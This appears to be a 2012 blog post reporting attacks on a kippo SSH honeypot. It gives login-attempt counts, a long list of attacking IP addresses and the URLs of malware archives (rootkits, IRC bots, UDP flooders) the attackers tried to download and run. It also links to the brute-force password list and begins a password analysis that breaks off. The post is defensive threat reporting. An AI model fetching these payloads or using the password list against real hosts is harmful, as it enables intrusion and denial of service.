Home » Archive

Articles in the Malware Category

Malware »

[2 Apr 2012 | 2 Comments | ]

Here is the result of the attacks on my kippo honeypot.
Total SSH login attempts count: 219710
Total unique passwords: 34354
Total Number of files tried to wget stuff and run it: 40 (including duplicates)
Total (unique) IPs that made those attempts: 205
Here is the list IP’s of the bots/hackers:
108.15.99.40
109.148.120.142
109.248.137.103
109.73.169.35
109.96.44.131
109.97.82.81
110.164.66.252
112.25.19.10
113.108.103.11
113.108.237.66
113.169.107.217
113.179.89.224
114.108.177.252
114.255.58.182
115.236.185.203
117.240.234.216
117.243.250.249
118.220.175.104
119.134.251.100
119.161.162.185
119.188.7.185
119.84.84.110
120.132.132.74
121.14.46.119
121.251.88.220
122.146.199.190
122.49.6.31
123.125.149.134
123.18.117.70
124.119.23.169
124.125.135.114
124.133.48.92
124.238.214.46
124.238.214.90
124.72.48.61
130.157.145.92
134.208.6.43
141.105.82.2
141.8.193.225
151.13.197.22
151.28.122.164
151.40.20.202
151.80.215.20
1.55.112.125
172.158.118.44
172.158.2.176
172.158.27.46
172.158.29.117
172.158.87.42
173.15.213.104
173.234.63.146
173.234.63.154
175.125.92.199
178.162.149.24
182.140.145.17
182.236.164.11
182.50.0.237
182.79.252.246
184.107.241.186
186.28.247.7
188.138.40.166
188.138.89.152
188.173.171.146
188.173.182.104
188.173.243.66
188.227.74.162
188.26.202.221
188.26.203.137
188.26.204.120
188.27.187.135
188.27.22.191
188.27.42.109
188.27.42.56
188.27.42.99
190.210.142.75
190.95.69.241
193.110.253.199
193.34.145.55
193.90.12.22
194.183.89.224
195.22.100.150
195.34.183.18
196.21.60.69
199.0.172.37
199.119.204.3
199.119.227.48
199.19.212.103
199.71.214.67
200.196.48.121
200.42.220.228
200.98.207.108
201.144.245.135
201.218.252.140
201.253.14.235
201.43.143.30
201.49.57.81
201.91.26.138
202.201.1.170
203.252.154.194
203.90.136.77
204.57.82.8
206.80.80.100
208.115.200.25
208.115.236.51
209.131.201.184
210.51.174.189
210.51.48.94
211.103.188.92
211.167.39.250
211.253.5.200
211.27.225.183
211.55.76.53
211.99.134.27
213.171.220.17
213.190.161.143
2.137.113.104
216.53.213.120
217.198.160.133
217.199.134.214
218.57.136.62
218.57.8.23
218.61.34.140
218.8.190.178
219.235.240.41
220.182.51.11
221.122.125.125
221.204.246.72
221.207.229.6
221.231.140.146
222.122.20.226
222.169.224.178
222.44.124.187
222.58.151.69
223.204.213.57
24.96.31.206
31.214.39.176
41.196.236.229
41.249.41.78
42.117.2.53
46.102.11.108
46.102.12.158
46.214.21.53
46.24.240.155
46.254.20.36
49.212.118.52
50.30.33.90
50.56.222.222
58.11.115.168
58.215.187.45
58.28.154.75
60.244.113.231
61.155.128.32
61.191.39.19
62.37.22.2
62.84.74.166
63.135.56.2
64.183.83.122
64.31.17.135
64.31.43.140
69.64.75.136
70.87.117.36
74.117.58.92
78.225.217.80
78.83.102.35
79.113.15.91
79.113.54.212
79.145.76.47
79.180.156.165
79.181.20.223
80.82.209.245
80.92.240.36
80.94.65.50
81.18.246.182
82.137.12.56
82.137.12.59
82.137.13.151
82.137.14.199
82.194.76.61
82.77.8.110
83.170.81.186
83.41.92.34
83.58.92.175
84.22.183.113
85.137.88.88
85.49.133.240
86.124.225.213
86.186.241.109
88.12.87.93
88.14.23.44
89.136.1.59
91.123.200.46
91.196.122.71
91.205.189.27
91.207.230.51
91.207.231.190
91.215.180.202
91.228.197.152
91.233.105.4
92.251.192.182
92.251.235.216
92.83.105.212
93.112.71.98
94.129.104.5
96.126.120.46
96.56.154.34
And the files they tried to download and run:

http://cioculetz.altervista.org/hecaru.tar
http://eleet.at.ua/hack/flood/bash.tcl
http://equinox.ucoz.com/boti.tgz
http://equinox.ucoz.com/rk.tgz
http://equinox.ucoz.com/sshd.tgz
http://hackzone.ucoz.ro/mlinux.tgz
http://hackzone.ucoz.ro/ryo.tgz
http://hackzone.ucoz.ro/udp.pl
http://gblteam.webs.com/gosh.tgz.tar
http://italianusimixu.do.am/scan/boti.tgz
http://linuxtrade.webs.com/psybnc-linux.tgz
http://mirc.go.ro/ire.tgz
http://nasul.clan.su/udp.tar
http://root-arhive.at.ua/psybnc/psybnc-linux.jpg
http://rymont.webs.com/MechBot.tgz
http://rymont.webs.com/rk.jpg
http://scama.clan.su/max.pl
http://thw.xnetworld.com/devil/gosh.tgz.tar
http://tradelinux.fr/udp.tgz
http://ircd.do.am/scan/random.tgz
http://mile.go.ro/pic.jpg
http://RAYDENNN.EscorteDeLux.eu/R/ryo.tgz
http://RAYDENNN.EscorteDeLux.eu/R/udp.pl
http://scama.clan.su/gate.tgz
http://wadafak.altervista.org/mech.tgz
http://www.deathface.comlu.com/flod/udp.tgz

Here is the password list they tried (sorted alphabetically)
http://0xa.li/files/pass_lst.zip
Pipal analysis of the list (thanks to Muhanad Shahat @sophto_92)

Total entries = 34352
Total unique entries = 34352

Top 10 passwords
…. = 1 (0.0%)
#### = 1 (0.0%)
….123 = 1 (0.0%)
123123 = …